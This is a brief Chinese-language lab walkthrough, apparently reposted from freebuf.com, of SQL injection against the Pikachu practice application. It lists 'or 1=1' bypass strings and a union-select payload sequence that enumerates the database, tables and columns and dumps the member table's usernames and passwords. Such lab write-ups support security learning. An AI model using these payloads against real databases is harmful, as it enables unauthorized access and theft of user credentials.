可以上图输出可预计代码逻辑为:
select uid,email where username = ‘kobe’;
或者
select uid,email where username =“kobe”;
才是我们来构造数据!!!!
kobe‘ or 1=1# //注意#号后边有一个空格,成功
或者
kobe” or 1=1#
后边的步骤老样子,就直接截图了!!!!
两列:
-1′ union select 1,2#’
-1′ union select database(),version()#’
-1′ union select 1,group_concat(table_name) from information_schema.tables where table_schema=’pikachu’#’
-1′ union select 1,group_concat(column_name) from information_schema.columns where table_name=’member’#’
-1′ union select username,pw from member#’
所有的用户名和密码对已经获得,结束!!!
来源:freebuf.com 2021-07-20 08:25:25 by: 知非知非知非
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
请登录后发表评论
注册